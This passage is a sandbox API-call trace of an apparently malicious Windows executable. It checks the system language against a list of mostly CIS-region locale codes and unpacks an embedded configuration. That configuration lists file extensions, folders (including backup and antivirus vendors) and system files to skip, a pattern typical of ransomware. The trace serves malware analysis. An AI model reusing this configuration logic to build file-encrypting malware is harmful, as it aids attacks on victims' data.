lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0086.550] GetCurrentThreadId () returned 0x3ac [0086.550] GetCurrentThreadId () returned 0x3ac [0086.550] GetCurrentThreadId () returned 0x3ac [0086.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e5e798, cbMultiByte=96, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0086.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e5e798, cbMultiByte=96, lpWideCharStr=0x1e7d3ac, cchWideChar=96 | out: lpWideCharStr="1049\r\n2072\r\n2073\r\n2115\r\n1091\r\n1058\r\n1090\r\n1092\r\n1064\r\n1059\r\n1067\r\n1079\r\n1087\r\n1088\r\n1062\r\n1063\r\n") returned 96 [0086.551] GetSystemDefaultLCID () returned 0x409 [0086.551] GetUserDefaultLCID () returned 0x409 [0086.551] GetSystemDefaultLangID () returned 0x220409 [0086.551] GetUserDefaultLangID () returned 0x409 [0086.551] GetSystemDefaultUILanguage () returned 0x409 [0086.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0086.557] GetCurrentThreadId () returned 0x3ac [0086.557] GetCurrentThreadId () returned 0x3ac [0086.557] GetCurrentThreadId () returned 0x3ac [0086.557] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.558] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.558] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.558] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.558] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.558] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.558] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.558] GetFileAttributesW (lpFileName="-n" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\-n")) returned 0xffffffff [0086.558] GetLastError () returned 0x2 [0086.558] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1e89eec, cbMultiByte=4, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="EMANﶈ꾫\x19쐈@Ӥ") returned 4 [0086.558] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x4f5480 [0086.558] LoadResource (hModule=0x400000, hResInfo=0x4f5480) returned 0x5260b0 [0086.558] SizeofResource (hModule=0x400000, hResInfo=0x4f5480) returned 0x47d [0086.559] LockResource (hResData=0x5260b0) returned 0x5260b0 [0086.559] FreeResource (hResData=0x5260b0) returned 0 [0086.559] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0086.559] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0086.559] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0086.559] LockResource (hResData=0x525e94) returned 0x525e94 [0086.559] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ed1c90, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0086.559] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ed1c90, cbMultiByte=38, lpWideCharStr=0x1eae20c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0086.559] FreeResource (hResData=0x525e94) returned 0 [0086.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0086.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1ed1c94, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0086.559] GetCurrentThreadId () returned 0x3ac [0086.559] GetCurrentThreadId () returned 0x3ac [0086.559] GetCurrentThreadId () returned 0x3ac [0086.559] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e27f68, cbMultiByte=1149, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1149 [0086.559] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e27f68, cbMultiByte=1149, lpWideCharStr=0x1e1630c, cchWideChar=1149 | out: lpWideCharStr="[NF_START]\r\nVBS\r\nRTF\r\nBMP\r\nTMP\r\nRDP\r\nSEK\r\nICO\r\nDLL\r\nBLF\r\nRBS\r\nREGTRANS-MS\r\nSETTINGCONTENT-MS\r\nSEARCH-MS\r\nLOG\r\nXML\r\nLOG1\r\nLOG2\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\\\r\n\\WINDOWS.OLD\\\r\n\\WINDOWS10UPGRADE\\\r\n\\$RECYCLE.BIN\\\r\n\\WINDOWS NT\\\r\n\\COMMON FILES\\\r\n\\TEMP\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\ACRONIS\\\r\n\\BACKUPCLIENT\\\r\n\\BACKUP MANAGER\\\r\n\\CARBONITE\\\r\n\\INTERNET EXPLORER\\\r\n\\WINDOWSPOWERSHELL\\\r\n\\WINDOWS DEFENDER\\\r\n\\TOR BROWSER\\\r\n\\DVD MAKER\\\r\n\\ASPNET_CLIENT\\\r\n\\REFERENCE ASSEMBLIES\\\r\n\\MICROSOFT OFFICE\\\r\n\\WINDOWS SIDEBAR\\\r\n\\WINDOWS MEDIA PLAYER\\\r\n\\MICROSOFT\\OFFICE\\\r\n\\MICROSOFT ONEDRIVE\\\r\n\\GOOGLE\\DRIVE\\\r\n\\DROPBOX\\\r\n\\MICROSOFT\\PROVISIONING\\\r\n\\MICROSOFT SILVERLIGHT\\\r\n\\PROGRAMDATA\\MICROSOFT\\\r\n\\MICROSOFT\\CRYPTO\\\r\n\\WINDOWSAPPS\\\r\n\\ACROBAT READER\r\n\\NVIDIA\r\n\\7-ZIP\\\r\n\\WINRAR\\\r\n\\ESET\r\n\\AVAST\r\n\\MALWAREBYTES\r\n\\SYMANTEC ENDPOINT\r\n\\TREND MICRO\r\n\\BITDEFENDER\r\n\\PANDA SECURITY\r\n\\MCAFEE\r\n\\KASPERSKY LAB\r\n\\KASPERSKYLAB\r\n\\AVDEFENDER\r\n\\SOPHOS\r\n\\AVG\r\n[ND_END]\r\n[FEX_START]\r\nNTUSER.DAT\r\nNTUSER.POL\r\nNTUSER.DAT.LOG\r\nNTUSER.DAT.LOG1\r\nNTUSER.DAT.LOG2\r\nICONCACHE.DB\r\nTHUMBS.DB\r\nBOOTSECT.BAK\r\nBOOTMGR\r\nDEFAULT.RDP\r\nPAGEFILE.SYS\r\nHIBERFIL.SYS\r\nSWAPFILE.SYS\r\nWORDPAD.EXE\r\n[FEX_END]\r\n") returned 1149 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.560] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0086.561] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 